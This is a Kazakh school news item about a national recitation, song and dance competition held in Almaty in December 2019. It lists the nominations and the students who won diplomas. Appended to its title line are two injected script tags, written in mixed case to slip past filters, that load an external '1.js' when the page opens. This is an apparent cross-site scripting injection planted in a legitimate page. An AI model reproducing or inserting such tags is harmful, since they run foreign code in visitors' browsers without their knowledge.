Республикалық көркем сөз, ән-би байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
25.12.2019
2019 жылдың 16-17 желтоқсан айының аралығында Алматы қаласы, П.И.Чайковский атындағы Алматы музыкалық колледжінің үлкен концерт залында "Тәуелсіздік деп соғады жүрегім" атты Республикалық көркем сөз, ән-би байқауы өтті. Байқауға көркем сөз оқу шеберлігін игерген, әншілік және бишілік қабілеттері бар, дәстүрлі ән орындауға икемденген, қандай да бір аспапта ойнауды меңгерген, ақындық дарындылыққа ие 3-22 жас аралығындағы балабақша мен білім беру мекемелерінің оқушылары мен жасөспірімдер қатысты.
Өнер көрсету бағытына байланысты байқау келесі номинациялар бойынша өткізілді:
- Көркем сөз;
- Эстрадалық вокал;
- Дәстүрлі ән;
- Аспапта орындау ;
- Хореография;
- Қол өнері; (Техникалық жұмыс)
- Шығарма;
- Бейнелеу өнері;
Байқауға оқушылар осы аталған номинациялардың ішінен төрт номинация бойынша қатысып, жүлделі оралды.
"Көркем сөз" номинациясы бойынша Жағыпар Жанел 1-орын дипломант, жетекшісі Елеубай Үміткер Талғатқызы.
"Эстрадалық вокал" номинациясы бойынша Елепаев Мирас лауреат 2-орын, жетекшісі Ноян Жанерке Сейденқызы.
Талғатбек Мөлдір дипломант 1-орын, жетекші Ноян Жанерке Сейденқызы.
Ерикова Нұргүл дипломант 1-орын, жетекші Елеубай Үміткер Талғатқызы.
Сармантаева Асемгуль дипломант 1-орын, жетекші Мажкен Қымбат
"Қолөнер" номинациясы бойынша Кенжигузинова Дильназ дипломант 1-орын, жетекшісі Утегенова Баян Талгатовна
"Хореграфия"ноиинациясы бойынша Быкова Ангелина лауреат 2-орын, жетекші Елеубай Үміткер Талғатқызы.